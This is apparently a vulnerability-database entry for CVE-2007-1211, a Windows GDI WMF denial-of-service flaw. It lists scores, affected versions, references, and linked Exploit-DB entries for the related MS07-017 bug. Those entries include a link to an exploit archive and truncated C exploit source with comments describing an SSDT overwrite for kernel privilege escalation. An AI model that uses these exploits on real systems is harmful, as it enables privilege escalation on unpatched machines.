CVE-2007-1211
Published 2007-04-04
Priority: P3 (36), high
CVSS 2.0: 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
EXPLOIT
EPSS: 31.27% (98.1th percentile)
Unspecified kernel GDI functions in Microsoft Windows 2000 SP4; XP SP2; and Server 2003 Gold, SP1, and SP2 allow user-assisted remote attackers to cause a denial of service (possibly persistent restart) via a crafted Windows Metafile (WMF) image that causes an invalid dereference of an offset in a kernel structure, a related issue to CVE-2005-4560.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb·2007-04-26
CVE-2007-1215 Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb·2007-04-17
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb·2007-04-08
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's change an entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
No writeups or analysis indexed.
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=499
http://www.securityfocus.com/archive/1/466186/100/200/threaded
http://www.securityfocus.com/bid/23275
http://www.securitytracker.com/id?1017843
http://www.vupen.com/english/advisories/2007/1215
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017
https://exchange.xforce.ibmcloud.com/vulnerabilities/33258
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1571